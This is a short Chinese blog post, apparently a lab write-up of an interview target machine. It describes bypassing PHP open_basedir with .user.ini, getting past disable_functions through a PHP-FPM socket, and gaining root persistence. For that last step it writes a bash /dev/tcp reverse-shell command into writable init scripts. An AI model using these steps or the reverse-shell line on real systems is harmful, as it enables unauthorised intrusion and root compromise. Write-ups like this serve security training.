前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次面试打靶机学到的三个技巧

记一次面试打靶机学到的三个技巧

作者头像
字节脉搏实验室
发布2020-06-05 10:26:11
6150
发布2020-06-05 10:26:11
举报
文章被收录于专栏:字节脉搏实验室

章源自【字节脉搏社区】-字节脉搏实验室

作者-whit

获取webshell的操作就不铺开讲了,都是常规手法。

拿到webshell之后,通过phpinfo看到disable_functions配置限制的函数,且目录权限受到open_basedir的限制,能执行系统命令的函数都被禁用,常规蚁剑提供的绕过方式也都被封锁,但是从phpinfo文件里发现系统上运行着FPM/FastCGI和nginx。

一、突破webshell目录限制:

在当前目录下新建.user.ini文件添加open_basedir绕过php.ini的全局限制。

open_basedir = :/

二、绕过disable_functions:

然后通过蚁剑进入文件管理发现tmp目录下有/tmp/php-cgi-56.sock文件,可以利用蚁剑插件绕过disable_functions,攻击fpm,直接与fpm通信,利用fpm绕过disable_functions。

之后用msf生成linux木马,通过绕过disable_functions得到的webshell执行木马,反弹交互式shell到自己的服务器。

三、提权手法:

通过提权脚本发现服务器上有部分应用的配置文件具有可写权限,且用root权限运行,如:

/etc/init.d/pure-ftpd

/etc/init.d/php-fpm-56

/etc/init.d/nginx

将反弹shell的语句:nohup bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1 & 写入配置文件中,服务器开启监听,等待应用重启或者查看状态等,我们自己的服务器将收到root反弹回来的shell。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-06-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档